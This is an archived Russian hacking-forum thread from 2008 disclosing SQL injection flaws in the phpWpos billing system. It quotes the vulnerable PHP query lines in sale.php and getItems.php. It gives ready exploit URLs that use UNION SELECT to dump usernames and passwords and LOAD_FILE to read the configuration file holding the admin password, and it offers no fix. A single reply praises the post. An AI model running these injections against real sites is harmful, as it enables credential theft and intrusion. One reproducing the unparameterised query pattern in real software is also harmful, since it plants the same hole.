Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   phpWpos bugs (https://forum.antichat.xyz/showthread.php?t=62116)

Constantine 18.02.2008 19:41

phpWpos bugs
 
{Некоторые уязвимости в биллинг системе phpWpos}

Офиц. сайт: http://phpwpos.sourceforge.net/


1)Sql inj в скрипте sale.php

PHP код:

<?php
$sql 
"select date, sale_sub_total, sale_total_cost from sales where id=" .$_GET['id'];
$result $db->query($sql);
$sales_info mysql_fetch_row($result);
?>

Эксплойт
Код:

http://localhost/wostest/sale.php?id=2+union+select+concat(password,0x3a,username),2,3+from+users/*
2)Sql inj в скрипте getItems.php
PHP код:

$db = new database($dbhost,$dbuser,$dbpassword,$dbname);
$result $db->query("select id, item_name, image, buy_price, unit_price, tax_percent, total_cost from items where category_id=" .$_GET['category']); 


Эксплойт:

Код:

http://localhost/wostest/getItems.php?category=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a3a3a3a,id,first_name,last_name,username,password,type)+from+users/*
{Трабла}
Парль администратора в БД не содержится, он прописан в конфиге. Для эксплуатации уязвимости требуется: file_priv = Y

Эксплойт
http://localhost/wostest/getItems.php?category=-1+union+select+1,2,3,4,5,6,LOAD_FILE('\path\site\c onfig.php')/*

Conquerstador 18.02.2008 20:20

Статья супер!


Время: 07:34